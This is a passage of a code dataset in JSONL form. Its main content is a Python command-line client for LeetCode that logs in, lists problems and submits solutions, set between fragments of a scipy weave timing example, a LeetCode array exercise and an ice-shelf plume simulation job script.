n)\n t1 = time.time()\n for i in range(n):\n print(i, end=' ')\n t2 = time.time()\n py = (t2-t1)\n\n # get it in cache\n inline_tools.inline('printf(\"%d\",i);',['i'])\n t1 = time.time()\n for i in range(n):\n inline_tools.inline('printf(\"%d\",i);',['i'])\n t2 = time.time()\n print(' speed in python:', py)\n print(' speed in c:',(t2 - t1))\n print(' speed up: %3.2f' % (py/(t2-t1)))\n\n\ndef cout_example(lst):\n # get it in cache\n i = lst[0]\n inline_tools.inline('std::cout << i << std::endl;',['i'])\n t1 = time.time()\n for i in lst:\n inline_tools.inline('std::cout << i << std::endl;',['i'])\n t2 = time.time()\n\nif __name__ == \"__main__\":\n n = 3000\n print_compare(n)\n print(\"calling cout with integers:\")\n cout_example([1,2,3])\n print(\"calling cout with strings:\")\n cout_example(['a','bb', 'ccc'])\n","repo_name":"ryfeus/lambda-packs","sub_path":"Skimage_numpy/source/scipy/weave/examples/print_example.py","file_name":"print_example.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":1104,"dataset":"github-code","pt":"22"} +{"seq_id":"74631696376","text":"nums = [0, 0, 1, 1, 1, 2, 2, 3, 3, 4]\n\n\"\"\"Initial answer\"\"\"\n# indexes_to_remove = []\n# nums_count = 0\n# for i, num in enumerate(nums):\n# if num == nums[i - 1] and i > 0:\n# indexes_to_remove.append(i)\n# nums_count += 1\n\n# removal_count = 0\n# for index in indexes_to_remove:\n# del nums[index - removal_count]\n# removal_count += 1\n\n# print(\"k:\", nums_count - removal_count)\n# print(\"nums:\", nums)\n\n\"\"\"More efficient answer\"\"\"\n\n# Doesn't even engage in computation if no length -> it can do the same if len(nums) = 1\nif not nums:\n print(0)\n\nwrite_index = 1 # Position to overwrite duplicates\n\nfor read_index in range(1, len(nums)):\n if nums[read_index] != nums[read_index - 1]:\n nums[write_index] = nums[read_index]\n write_index += 1\n\n# Truncate the remaining duplicates\ndel nums[write_index:]\n\nprint(write_index)\n","repo_name":"cucupac/leetcode","sub_path":"interview_150/problem_3.py","file_name":"problem_3.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"73434219921","text":"#! /usr/bin/env python3\n\n\"\"\"\nLeetCode at Office\n\"\"\"\n\nimport ast\nimport logging\nimport os.path\nimport sys\nimport time\nimport typing\n\nfrom collections import namedtuple\nfrom urllib.parse import urljoin\n\nimport bs4\nimport click\nimport dogpile.cache\nimport requests\nimport requests.sessions\nimport requests.cookies\n\nfrom termcolor import cprint\n\nFORMATTER = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nlogger = logging.getLogger('lcao')\n\nUSER_DIRECTORY = os.path.expanduser('~')\nCONFIG_DIRECTORY = os.path.join(USER_DIRECTORY, '.config', 'lcao')\n\nfile_cache_region = dogpile.cache.make_region(name='lcao')\nmemory_cache_region = dogpile.cache.make_region(name='lcao.memory').configure(\n backend='dogpile.cache.memory',\n expiration_time=300\n)\n\n\nclass _Endpoints(object):\n BASE_URL = 'https://leetcode.com'\n HOST = 'leetcode.com'\n LOGIN = urljoin(BASE_URL, 'accounts/login')\n LOGOUT = urljoin(BASE_URL, 'accounts/logout')\n ALL_PROBLEMS = urljoin(BASE_URL, 'api/problems/all')\n SUBMISSIONS = urljoin(BASE_URL, 'submissions/')\n\n @staticmethod\n def problem_description(problem_slug: str) -> str:\n return urljoin(_Endpoints.BASE_URL, 'problems/{}/description/'.format(problem_slug))\n\n @staticmethod\n def run_code(problem_slug: str) -> str:\n return urljoin(_Endpoints.BASE_URL, 'problems/{}/interpret_solution/'.format(problem_slug))\n\n @staticmethod\n def submit_code(problem_slug: str) -> str:\n return urljoin(_Endpoints.BASE_URL, 'problems/{}/submit/'.format(problem_slug))\n\n @staticmethod\n def check_run_code_status(interpret_id: str) -> str:\n return urljoin(\n _Endpoints.BASE_URL,\n 'submissions/detail/{}/check'.format(interpret_id)\n )\n\n\n_UserInformation = namedtuple('_UserInformationTuple', [\n 'name', 'num_solved', 'ac_easy', 'ac_medium', 'ac_hard', 'subscribed'\n])\n\n_AllProblemsInformation = namedtuple('_ProblemInformation', [\n 'total_num', 'num_easy', 'num_medium', 'num_hard'\n])\n\n_ProblemStatisticalInformation = namedtuple('_ProblemStatisticalInformation', [\n 'total_submitted', 'total_accepts', 'frequency'\n])\n\n_ProblemListItem = namedtuple('_ProblemListItem', [\n 'index', 'title', 'slug', 'difficulty', 'statistical_info', 'paid_only', 'status'\n])\n\n_ProblemInformation = namedtuple('_ProblemInformation', [\n 'index', 'title', 'description', 'code_definition', 'sample_testcase'\n])\n\n_TestRunResultSuccess = namedtuple('_TestRunResultSuccess', [\n 'test_case', 'expected', 'expected_time', 'actual', 'actual_time', 'code_output'\n])\n\n_TestRunResultFailure = namedtuple('_TestRunResultFailure', [\n 'error', 'test_case', 'code_output'\n])\n\n_SubmitResultAccepted = namedtuple('_SubmitResultSuccess', [\n 'time', 'stdout', 'total_test_cases'\n])\n\n_SubmitResultWrongAnswer = namedtuple('_SubmitResultWrongAnswer', [\n 'total_test_cases', 'total_correct', 'stdout', 'last_failed_test_case', 'last_expected', 'last_actual',\n 'test_results'\n])\n\n_SubmitResultFailure = namedtuple('_SubmitResultFailure', [\n 'error', 'stdout', 'last_failed_test_case'\n])\n\n_RUN_ERROR_STATUS_CODE = {\n 12: 'Memory Limit Exceeded',\n 14: 'Time Limit Exceeded',\n 15: 'Runtime Error',\n 20: 'Compile Error'\n}\n\n_DIFFICULTY_NAME_MAPPER = {\n 1: 'Easy',\n 2: 'Medium',\n 3: 'Hard'\n}\n\n_DIFFICULTY_COLOR_MAPPER = {\n 1: 'green',\n 2: 'magenta',\n 3: 'red'\n}\n\n_STATUS_NAME_MAPPER = {\n None: '-',\n 'notac': '?',\n 'ac': '*'\n}\n\n_STATUS_COLOR_MAPPER = {\n None: 'grey',\n 'notac': 'red',\n 'ac': 'green'\n}\n\n\nclass _PrintFormatter(object):\n STATUS = ' {:1s} '\n INDEX = '{:5s}'\n TITLE = '{:60s}'\n DIFFICULTY = '{:12s}'\n ACCEPTANCE_RATE = '{:12s}'\n SUBSCRIBE_REQUIRED = '{:10s}'\n\n\n_LIST_PROBLEM_FORMATTER = ''.join([\n _PrintFormatter.STATUS,\n _PrintFormatter.INDEX,\n _PrintFormatter.TITLE,\n _PrintFormatter.DIFFICULTY,\n _PrintFormatter.ACCEPTANCE_RATE,\n _PrintFormatter.SUBSCRIBE_REQUIRED\n])\n\n_LANGUAGE_EXT_MAPPER = {\n '.c': 'c',\n '.cpp': 'cpp',\n '.cs': 'csharp',\n '.go': 'golang',\n '.java': 'java',\n '.js': 'javascript',\n '.py': 'python',\n '.rb': 'ruby',\n '.scala': 'scala',\n '.sql': 'mysql'\n}\n\n\ndef _parse_raw_problem_html(html_data: str) -> _ProblemInformation:\n parser = bs4.BeautifulSoup(html_data, 'html.parser')\n\n detail_container = parser.select_one('div[class=\"container question-detail-container\"]')\n\n caption = detail_container.select_one('h3')\n index, title = caption.text.strip().split('. ')\n\n description = detail_container.select_one('div[class=\"question-description\"]').text.strip()\n\n # Code definition is hardcoded in the JavaScript part... How sad we have to use regexp to capture them\n # Brutal force search for the <script> element with the code definition\n code_definition = {}\n sample_test_case = ''\n\n scripts = parser.select('script')\n interested_script_element = None\n for script in scripts:\n if 'var pageData' in script.text:\n interested_script_element = script\n break\n\n if interested_script_element:\n for line in interested_script_element.text.split('\\n'):\n if 'codeDefinition' in line:\n _, definition_raw = line.split(': ', 1)\n # Remove tailing ',' as it is part of a JSON object\n definition_raw = definition_raw.strip(',')\n code_definition = {\n item['value']: item['defaultCode']\n for item in ast.literal_eval(definition_raw)\n }\n if 'sampleTestCase' in line:\n _, sample_test_case = line.split(': ', 1)\n # Remove tailing ',', as it is part of a JSON object\n sample_test_case = ast.literal_eval(sample_test_case.strip(','))\n\n return _ProblemInformation(\n index=int(index),\n title=title,\n description=description,\n code_definition=code_definition,\n sample_testcase=sample_test_case\n )\n\n\nclass LeetCode(object):\n def __init__(self) -> None:\n self._session_ = None\n\n @property\n def _session(self) -> requests.Session:\n if not self._session_:\n persisted_cookies = file_cache_region.get('cookies') or {}\n self._session_ = requests.session()\n self._session_.cookies = requests.cookies.cookiejar_from_dict(persisted_cookies)\n self._session_.cookies.clear_expired_cookies()\n return self._session_\n\n def login(self, username, password):\n \"\"\" Authenticate LeetCode via username and password, and get session\n \"\"\"\n if self.is_authenticated():\n logger.info('Already authenticated.')\n return\n\n # We need to get the csrftoken cookie\n del self._session.cookies['csrftoken']\n _ = self._session.get(_Endpoints.LOGIN)\n auth_result = self._session.post(_Endpoints.LOGIN, data={\n 'login': username,\n 'password': password,\n 'remember': 'on',\n 'csrfmiddlewaretoken': self._session.cookies.get('csrftoken')\n }, headers={\n 'referer': _Endpoints.LOGIN\n })\n\n if not auth_result.ok:\n raise RuntimeError('Login failed: HTTP {}'.format(auth_result.status_code))\n logger.info('Login as {} succeed'.format(username))\n\n # Persist the authentication information to cache\n file_cache_region.set('cookies', self._session.cookies.get_dict())\n\n def logout(self):\n \"\"\" Logout of LeetCode \"\"\"\n if not self.is_authenticated():\n logger.warning('Cannot logout, not authenticated')\n return\n\n self._session.get(_Endpoints.LOGOUT)\n file_cache_region.delete('cookies')\n\n def is_authenticated(self) -> bool:\n \"\"\" Check if we have already login \"\"\"\n # We try to open submissions log. This is only accessible when you are logged in.\n submissions = self._session.get(_Endpoints.SUBMISSIONS, allow_redirects=False)\n if 'Location' in submissions.headers:\n # Redirect to login page, not authenticated\n logger.debug('Redirect to: {}'.format(submissions.headers['Location']))\n return False\n return True\n\n # NOTE: I cannot use -> dict to specify the return type, because\n # dogpile.cache does not support this. See:\n # https://bitbucket.org/zzzeek/dogpile.cache/issues/96/support-python3-keyword-only-arguments-for\n def _all_problems(self):\n \"\"\" Collect all problems/user information \"\"\"\n # LeetCode API is poorly designed, everything in the same endpoint...\n all_problems_result = self._session.get(_Endpoints.ALL_PROBLEMS)\n if not all_problems_result.ok:\n raise RuntimeError('Unable to retrieve api/problems/all, HTTP {}'.format(all_problems_result.status_code))\n return all_problems_result.json()\n\n def user_information(self) -> _UserInformation:\n if not self.is_authenticated():\n raise RuntimeError('Need login first')\n all_problems = self._all_problems()\n return _UserInformation(\n name=all_problems['user_name'],\n num_solved=all_problems['num_solved'],\n ac_easy=all_problems['ac_easy'],\n ac_medium=all_problems['ac_medium'],\n ac_hard=all_problems['ac_hard'],\n subscribed=all_problems['is_paid']\n )\n\n def problems_information(self) -> _AllProblemsInformation:\n all_problems = self._all_problems()\n if 'num_total' not in all_problems:\n raise RuntimeError('Unable to retrieve problem list.')\n level_problem_count = [\n len([i for i in all_problems['stat_status_pairs'] if i['difficulty']['level'] == difficulty])\n for difficulty in (1, 2, 3)\n ]\n return _AllProblemsInformation(\n total_num=all_problems['num_total'],\n num_easy=level_problem_count[0],\n num_medium=level_problem_count[1],\n num_hard=level_problem_count[2]\n )\n\n @memory_cache_region.cache_on_arguments()\n # NOTE: See NOTE for self._all_problems\n def problems(self):\n all_problems = self._all_problems()\n if 'stat_status_pairs' not in all_problems:\n raise RuntimeError('Unable to retrieve problem list.')\n result = []\n for item in all_problems['stat_status_pairs']:\n result.append(_ProblemListItem(\n index=item['stat']['question_id'],\n title=item['stat']['question__title'],\n slug=item['stat']['question__title_slug'],\n difficulty=item['difficulty']['level'],\n statistical_info=_ProblemStatisticalInformation(\n total_submitted=item['stat']['total_submitted'],\n total_accepts=item['stat']['total_acs'],\n frequency=item['frequency']\n ),\n paid_only=item['paid_only'],\n status=item['status']\n ))\n return result\n\n def _find_problem_item(self, index: int) -> _ProblemListItem:\n problem_item = None\n for item in self.problems():\n if item.index == index:\n problem_item = item\n break\n if not problem_item:\n raise IndexError('Invalid index: {}'.format(index))\n return problem_item\n\n def problem(self, index):\n problem_item = self._find_problem_item(index)\n problem_description = self._session.get(\n _Endpoints.problem_description(problem_item.slug),\n # If the problem requires SUBSCRIBE while you are not logged in, it will let you redirect\n allow_redirects=False\n )\n if problem_description.status_code != 200:\n raise RuntimeError('Unable to get problem {}. {}: HTTP {}'.format(\n problem_item.index, problem_item.slug, problem_description.status_code))\n\n return _parse_raw_problem_html(problem_description.content)\n\n @memory_cache_region.cache_on_arguments()\n # NOTE: See NOTE for self._all_problems\n def _generate_submit_code_header(self, slug):\n return {\n 'Referer': _Endpoints.problem_description(slug),\n 'x-csrftoken': self._session.cookies.get('csrftoken', domain=_Endpoints.HOST),\n 'X-Requested-With': 'XMLHttpRequest'\n }\n\n def _submit_code(self, index: int, slug: str, endpoint: str, language: str, code: str, test_case: str) -> dict:\n json_data = {\n 'data_input': test_case,\n 'judge_type': 'large',\n 'lang': language,\n 'question_id': str(index),\n 'test_mode': False,\n 'typed_code': code\n }\n run_test_result = self._session.post(\n endpoint,\n json=json_data,\n headers=self._generate_submit_code_header(slug)\n )\n if run_test_result.status_code != 200:\n raise RuntimeError(\n 'Run code failed, HTTP: {} {}'.format(run_test_result.status_code, run_test_result.text))\n\n return run_test_result.json()\n\n def _collect_submit_results(self, submit_ids: typing.List[str], slug: str,\n progress_callback: typing.Callable[[typing.List[str]], None] = None) \\\n -> typing.List[dict]:\n num_ids = len(submit_ids)\n\n result_received = [False] * num_ids\n result_json = [{}] * num_ids\n\n header = self._generate_submit_code_header(slug)\n\n while not all(result_received):\n for index, _id in enumerate(submit_ids):\n if result_received[index]:\n continue\n status = self._session.get(\n _Endpoints.check_run_code_status(_id),\n headers=header\n )\n if not status.ok:\n logger.warning('Unable to GET {}: HTTP {}'.format(_Endpoints.check_run_code_status(_id),\n status.status_code))\n result_json[index] = status.json()\n if 'run_success' in result_json[index]:\n result_received[index] = True\n\n if progress_callback:\n progress_callback([result_json[index]['state'] for index in range(num_ids)])\n\n time.sleep(1)\n\n return result_json\n\n def _report_test_run_submit_failures(self, result_json: dict, test_case: str) \\\n -> typing.Union[_TestRunResultFailure, None]:\n if result_json['run_success']:\n return None\n\n status_code = result_json['status_code']\n\n if status_code == 20:\n return _TestRunResultFailure(\n test_case=test_case,\n error='Compile error: {}'.format(result_json['compile_error']),\n code_output=[])\n if status_code == 15:\n return _TestRunResultFailure(\n test_case=test_case,\n error='Runtime error: {}'.format(result_json['runtime_error']),\n code_output=result_json['code_output'])\n return _TestRunResultFailure(\n test_case=test_case,\n error=_RUN_ERROR_STATUS_CODE.get(status_code, 'Unknown error code: {}'.format(status_code)),\n code_output=result_json['code_output']\n )\n\n def test_run(self, index: int, language: str, code: str, test_case: str = None,\n test_run_status_callback: typing.Callable[[typing.List[str]], None] = None) \\\n -> typing.Union[_TestRunResultSuccess, _TestRunResultFailure]:\n\n problem_item = self._find_problem_item(index)\n problem_description = self.problem(index)\n test_case = test_case or problem_description.sample_testcase\n\n test_run_status_json = self._submit_code(\n index=index,\n slug=problem_item.slug,\n endpoint=_Endpoints.run_code(problem_item.slug),\n language=language,\n code=code,\n test_case=test_case\n )\n if 'error' in test_run_status_json:\n return _TestRunResultFailure(test_case=test_case, error=test_run_status_json['error'], code_output=[])\n\n # LeetCode will run two processes, one generates the expected value, the other generates the result from\n # test run\n expected_json, actual_json = self._collect_submit_results(\n submit_ids=[test_run_status_json['interpret_expected_id'], test_run_status_json['interpret_id']],\n slug=problem_item.slug,\n progress_callback=test_run_status_callback\n )\n\n # We always assume the standard solution is working, i.e. expected_json is always successful\n failure = self._report_test_run_submit_failures(result_json=actual_json, test_case=test_case)\n if failure:\n return failure\n\n return _TestRunResultSuccess(\n test_case=test_case,\n expected=expected_json['code_answer'],\n expected_time=expected_json['status_runtime'],\n actual=actual_json['code_answer'],\n actual_time=actual_json['status_runtime'],\n code_output=actual_json['code_output']\n )\n\n def _report_submit_code_failures(self, result_json: dict) \\\n -> typing.Union[_SubmitResultFailure, None]:\n if result_json['run_success']:\n return None\n\n status_code = result_json['status_code']\n\n # Compile error\n if status_code == 20:\n return _SubmitResultFailure(\n error='Compile error: {}'.format(result_json['compile_error']),\n stdout=[],\n last_failed_test_case=None\n )\n if status_code == 15:\n return _SubmitResultFailure(\n error='Runtime error: {}'.format(result_json['runtime_error']),\n stdout=result_json['std_output'],\n last_failed_test_case=result_json['last_testcase']\n )\n return _SubmitResultFailure(\n error=_RUN_ERROR_STATUS_CODE.get(status_code, 'Unknown error code: {}'.format(status_code)),\n stdout=result_json['std_output'],\n last_failed_test_case=result_json['last_testcase']\n )\n\n def submit_code(self, index: int, language: str, source_code: str,\n submit_status_callback: typing.Callable[[typing.List[str]], None] = None) \\\n -> typing.Union[_SubmitResultAccepted, _SubmitResultWrongAnswer, _SubmitResultFailure]:\n\n problem_item = self._find_problem_item(index)\n # We read the problem in order to get the CSRF token\n self.problem(index)\n\n submit_status_json = self._submit_code(\n index=index,\n slug=problem_item.slug,\n endpoint=_Endpoints.submit_code(problem_item.slug),\n language=language,\n code=source_code,\n test_case=''\n )\n if 'error' in submit_status_json:\n return _SubmitResultFailure(error=submit_status_json['error'])\n\n submit_result_json = self._collect_submit_results(\n submit_ids=[submit_status_json['submission_id']],\n slug=problem_item.slug,\n progress_callback=submit_status_callback\n )[0]\n\n failure = self._report_submit_code_failures(submit_result_json)\n if failure:\n return failure\n\n total_test_cases = submit_result_json['total_testcases']\n total_correct = submit_result_json['total_correct']\n if total_test_cases == total_correct:\n # Accepted\n return _SubmitResultAccepted(\n time=submit_result_json['status_runtime'],\n stdout=submit_result_json['std_output'],\n total_test_cases=total_test_cases\n )\n else:\n # Wrong answer\n return _SubmitResultWrongAnswer(\n total_test_cases=total_test_cases,\n total_correct=total_correct,\n stdout=submit_result_json['std_output'],\n last_failed_test_case=submit_result_json['input'],\n last_expected=submit_result_json['expected_output'],\n last_actual=submit_result_json['code_output'],\n test_results=submit_result_json['compare_result'],\n )\n\n\ndef _setup_logger(level=logging.INFO) -> None:\n handler = logging.StreamHandler(stream=sys.stderr)\n handler.setLevel(level)\n handler.setFormatter(FORMATTER)\n\n logger.addHandler(handler)\n\n\ndef _setup_cache() -> None:\n if not os.path.exists(CONFIG_DIRECTORY):\n logger.warning('Config directory not exist, creating {}'.format(CONFIG_DIRECTORY))\n os.makedirs(CONFIG_DIRECTORY, mode=0o700, exist_ok=True)\n file_cache_region.configure(\n backend='dogpile.cache.dbm',\n expiration_time=86400,\n arguments={\n 'filename': os.path.join(CONFIG_DIRECTORY, 'cache.dbm')\n }\n )\n\n\n@click.command()\n@click.argument(\"username\")\n@click.password_option(confirmation_prompt=False)\ndef login(username: str, password: str) -> None:\n if not username:\n raise RuntimeError('No user name provided')\n\n lc = LeetCode()\n if lc.is_authenticated():\n raise RuntimeError('Already logged in')\n\n lc.login(username, password)\n\n\n@click.command()\ndef info() -> None:\n lc = LeetCode()\n user_info = lc.user_information()\n problems_info = lc.problems_information()\n cprint('{:30s}'.format('User name:'), 'green', end='')\n cprint(user_info.name, 'red', end='')\n cprint(' [{}]'.format(\n 'SUBSCRIBED' if user_info.subscribed else 'NOT SUBSCRIBED'), 'blue'\n )\n cprint('{:30s}'.format('Number problems solved:'), 'green', end='')\n cprint('{}/{} ({:.2f}%)'.format(\n user_info.num_solved,\n problems_info.total_num,\n user_info.num_solved / problems_info.total_num * 100), 'red'\n )\n cprint(' {:26s}'.format('Easy'), 'green', end='')\n cprint('{}/{} ({:.2f}%)'.format(\n user_info.ac_easy,\n problems_info.num_easy,\n user_info.ac_easy / problems_info.num_easy * 100), 'red'\n )\n cprint(' {:26s}'.format('Medium'), 'green', end='')\n cprint('{}/{} ({:.2f}%)'.format(\n user_info.ac_medium,\n problems_info.num_medium,\n user_info.ac_medium / problems_info.num_medium * 100), 'red'\n )\n cprint(' {:26s}'.format('Hard'), 'green', end='')\n cprint('{}/{} ({:.2f}%)'.format(\n user_info.ac_hard,\n problems_info.num_hard,\n user_info.ac_hard / problems_info.num_hard * 100), 'red'\n )\n\n\n@click.command()\n@click.argument('index')\n@click.option('--language', default=None, help='Code defintion')\ndef problem(index: int, language: str) -> None:\n lc = LeetCode()\n # click is not respecting Python 3 type spec, have to cast\n problem = lc.problem(int(index))\n if language and language not in problem.code_definition:\n raise ValueError('Unsupported language {}, supported languages: {}'.format(\n language, problem.code_definition.keys()))\n\n print()\n cprint(' {}. {}'.format(problem.index, problem.title), 'white', attrs=['bold'])\n print()\n cprint(problem.description, 'white')\n print()\n\n if not language:\n if 'cpp' in problem.code_definition:\n language = 'cpp'\n else:\n language = next(iter(problem.code_definition.keys()))\n\n cprint(' Code definition:', 'white', attrs=['bold'], end='')\n cprint(' ({})'.format(language), 'yellow')\n print()\n cprint(problem.code_definition[language], 'white')\n print()\n\n cprint(' Default Test Sample:', 'white', attrs=['bold'])\n print()\n cprint(problem.sample_testcase, 'white')\n print()\n\n\ndef _prepare_post_code(index: str, source: str, language: str) -> typing.Tuple[int, str, str]:\n # From command line, index is string, we have to do the casting\n index = int(index)\n\n with open(source, 'r') as stream:\n source_code = stream.read()\n if not language:\n _, ext = os.path.splitext(source)\n if ext not in _LANGUAGE_EXT_MAPPER:\n raise KeyError(\n 'Unrecognized extension {}, known extensions {}'.format(ext, _LANGUAGE_EXT_MAPPER.keys()))\n language = _LANGUAGE_EXT_MAPPER[ext]\n\n return (index, source_code, language)\n\n\n@click.command()\n@click.argument('index')\n@click.argument('source')\n@click.option('--language', default=None, help='Language')\n@click.option('--test-input', default=None, help='Custom test input')\n# FIXME mutual exclusive test-input and test-input-file\n# @click.option('--test-input-file', default=None, help='Custom test input, read from file')\ndef test_run(index: int, source: str, language: str,\n test_input: str) -> None: # Click does not respect Python3 type spec\n index, source_code, language = _prepare_post_code(index, source, language)\n\n lc = LeetCode()\n if not lc.is_authenticated():\n raise RuntimeError('Test run requires login.')\n\n cprint(' Testing problem {}'.format(index), 'white', attrs=['bold'])\n print()\n\n result = lc.test_run(\n index=index,\n language=language,\n code=source_code,\n test_case=test_input\n )\n\n cprint(' Test case:', 'blue', attrs=['bold'])\n print()\n print(result.test_case)\n print()\n\n cprint(' Code output:', 'blue', attrs=['bold'])\n print()\n for line in result.code_output:\n print(line)\n print()\n\n if isinstance(result, _TestRunResultFailure):\n cprint(' ERROR: ', 'red', attrs=['bold'], end='')\n cprint(result.error, 'red')\n print()\n return\n\n cprint(' Expected: ', 'green', attrs=['bold'], end='')\n cprint(result.expected_time, 'white')\n print()\n for line in result.expected:\n cprint(line, 'blue')\n print()\n cprint(' Actual: ', 'green', attrs=['bold'], end='')\n cprint(result.actual_time, 'white')\n print()\n for line in result.actual:\n cprint(line, 'blue')\n print()\n\n\n@click.command()\n@click.argument('index')\n@click.argument('source')\n@click.option('--language', default=None, help='Language')\ndef submit(index: int, source: str, language: str) -> None:\n index, source_code, language = _prepare_post_code(index, source, language)\n\n lc = LeetCode()\n if not lc.is_authenticated():\n raise RuntimeError('Test run requires login.')\n\n cprint(' Submit problem {}'.format(index), 'white', attrs=['bold'])\n print()\n\n result = lc.submit_code(index=index, language=language, source_code=source_code)\n\n cprint(' STDOUT:', 'blue', attrs=['bold'])\n print()\n print(result.stdout)\n print()\n\n if isinstance(result, _SubmitResultAccepted):\n cprint(' ACCEPTED ', 'green', attrs=['bold'], end='')\n cprint(result.time, 'white')\n print()\n cprint(' Passed {} test cases.'.format(result.total_test_cases), 'blue', attrs=['bold'])\n return\n\n if isinstance(result, _SubmitResultFailure):\n cprint(' ERROR: ', 'red', attrs=['bold'], end='')\n cprint(result.error, 'red')\n print()\n\n elif isinstance(result, _SubmitResultWrongAnswer):\n cprint(' TEST CASES: ', 'blue', attrs=['bold'], end='')\n cprint(result.total_correct, 'red', attrs=['bold'], end='')\n print('/', end='')\n cprint(result.total_test_cases, 'red', end='')\n print()\n for index, ch in enumerate(result.test_results):\n if index % 40 == 0:\n print('\\n ', end='')\n if ch == '0':\n cprint('F', 'red', end='')\n else:\n cprint('.', 'green', end='')\n print()\n print()\n\n cprint(' WRONG ANSWER', 'red', attrs=['bold'])\n print()\n cprint(' Expected:', 'red')\n print()\n print(result.last_expected)\n print()\n cprint(' Actual:', 'red')\n print()\n print(result.last_actual)\n print()\n\n if result.last_failed_test_case:\n cprint(' Last failed test case:', 'red')\n print()\n print(result.last_failed_test_case)\n print()\n\n\n@click.command()\n@click.option('--difficulty', help='Difficulty (easy/medium/hard)')\n@click.option('--status', help='Status (intacted/tried/accepted)')\n@click.option('--sort', help='Sort key (index/difficulty/frequency)[-(asc/desc)]', default='index-asc')\ndef list(difficulty: int, status: str, sort: str) -> None:\n lc = LeetCode()\n problems = lc.problems()\n\n def _sort(problems: typing.List[_ProblemListItem]) -> typing.List[_ProblemListItem]:\n sort_keys = sort.lower().split('-')\n if len(sort_keys) == 1:\n sort_keys.append('asc')\n\n if sort_keys[0] not in ('index', 'difficulty', 'frequency') or sort_keys[1] not in ('asc', 'desc'):\n raise ValueError('Unexpected sort instruction: {}'.format(sort))\n\n if sort_keys[0] == 'index':\n problems.sort(key=lambda i: i.index, reverse=sort_keys[1] == 'desc')\n elif sort_keys[0] == 'difficulty':\n problems.sort(\n key=lambda i: i.statistical_info.total_accepts / i.statistical_info.total_submitted,\n # On the opposite of difficulty, high accept rate implies easier problem\n reverse=sort_keys[1] != 'desc'\n )\n problems.sort(key=lambda i: i.difficulty, reverse=sort_keys[1] == 'desc')\n elif sort_keys[0] == 'frequency':\n problems.sort(key=lambda i: i.frequency, reverse=sort_keys[1] == 'desc')\n\n return problems\n\n def _filter(problems: typing.List[_ProblemListItem]) -> typing.Generator[_ProblemListItem, None, None]:\n STATUS_MAPPER = {'intacted': '-', 'tried': '?', 'accepted': '*'}\n if status and not lc.is_authenticated():\n raise RuntimeError('Need login to see problem status')\n for item in problems:\n if difficulty and item.difficulty != {'easy': 1, 'medium': 2, 'hard': 3}[difficulty]:\n continue\n if status and _STATUS_NAME_MAPPER[item.status] != STATUS_MAPPER[status]:\n continue\n yield item\n\n cprint(_LIST_PROBLEM_FORMATTER.format('', 'Id', 'Title', 'Difficulty', 'Rate', 'Status'), 'white',\n attrs=['bold'])\n cprint('=' * len(_LIST_PROBLEM_FORMATTER.format('', '', '', '', '', '')), 'white', attrs=['bold'])\n count = 0\n for item in _filter(_sort(problems)):\n count += 1\n cprint(_PrintFormatter.STATUS.format(_STATUS_NAME_MAPPER[item.status]),\n color=_STATUS_COLOR_MAPPER[item.status], end='')\n cprint(_PrintFormatter.INDEX.format(str(item.index)),\n color='white', end='')\n cprint(_PrintFormatter.TITLE.format(item.title),\n color='white', end='')\n cprint(_PrintFormatter.DIFFICULTY.format(_DIFFICULTY_NAME_MAPPER[item.difficulty]),\n color=_DIFFICULTY_COLOR_MAPPER[item.difficulty], end='')\n cprint(_PrintFormatter.ACCEPTANCE_RATE.format('{:.2f}%'.format(item.statistical_info.total_accepts /\n item.statistical_info.total_submitted * 100)),\n color='yellow', end='')\n cprint(_PrintFormatter.SUBSCRIBE_REQUIRED.format('SUBSCRIBE' if item.paid_only else ''),\n color='cyan', attrs=['bold'], end='')\n print()\n cprint('\\n TOTAL PROBLEMS: ', 'white', end='')\n cprint('{:5d}'.format(count), 'red', attrs=['bold'])\n\n\n@click.command()\ndef logout() -> None:\n LeetCode().logout()\n\n\n@click.group()\ndef main() -> None:\n pass\n\n\nmain.add_command(login)\nmain.add_command(info)\nmain.add_command(list)\nmain.add_command(problem)\nmain.add_command(test_run)\nmain.add_command(submit)\nmain.add_command(logout)\n\nif __name__ == '__main__':\n _setup_logger()\n _setup_cache()\n main()\n","repo_name":"xis19/lcao","sub_path":"lcao.py","file_name":"lcao.py","file_ext":"py","file_size_in_byte":31920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21561391678","text":"import os\n\nfrom gcplume import *\nfrom submit_GC_job import *\n\ndef kickoff( email, walltime,unique_str, queue_mode ):\n\n j = LinearShelfJob()\n j.default_flwa = 1.0e-16\n j.uniform_acab = -1.2\n j.n = 30\n j.m = 20\n j.nlevel = 3\n j.tend = 200.0\n j.tstart = 0.0\n j.ice_dt = 0.1\n j.hx = 1000.0\n j.hy = 1000.0\n j.use_plume = 1\n j.plume_dt = 60.0\n j.otopg = -2000.0\n j.upthk = 600.0\n j.ifthk = 550.0\n j.randthk = 0.0\n\n j.plume = { 'plume_min_thickness' : 50.0,\n }\n\n j.gc = {'options' : {'flow_law' : 2,\n 'temperature' : 0,\n },\n 'boundary condition params' : {'tau_xy_0' : 50.0e+3,\n 'x_invariant' : False,\n 'use_lateral_stress_bc' : False,\n },\n 'Petermann shelf' : { 'air_temperature' : -20.0,\n 'accumulation_rate' : j.uniform_acab,\n },\n\n 'picard parameters' : {'small_vel' : 0.01,\n 'minres' : 1.0e-5,\n 'y_overrideres' : 1.0e-9,\n 'cvg_accel' : 1.25,\n },\n 'plume' : {'plume_const_bmlt' : False,\n 'plume_steadiness_tol' : 1.0e-5,\n },\n }\n\n\n oceantemps = [-2.0,-0.5, 0.0, 0.5]\n# oceantemps = [0.0]\n upvels = [-900.0, -1000.0, -1100.0]\n# upvels = [-1000.0]\n phis = [0.0]\n\n for t in oceantemps:\n for upvel in upvels:\n for phi in phis:\n\n j.name = 'pn_%.1fC_%.1fma_%.0fd_noslip_%s' % (t,upvel,phi,unique_str)\n \n jdir = os.path.join(os.path.expandvars('$GC_JOBS'),\n j.name)\n\n if (not(os.path.lexists(jdir))):\n os.mkdir(jdir)\n \n j.jobDir = jdir\n \n j.upvel = upvel\n j.plume = {'temptop' : t,\n 'tempbot' : t,\n 'salttop' : 34.765,\n 'saltbot' : 34.765,\n 'plume_min_thickness' : 25.0,\n 'phi' : phi}\n\n j.assertCanStage()\n j.serialize()\n submit_job(j,email, 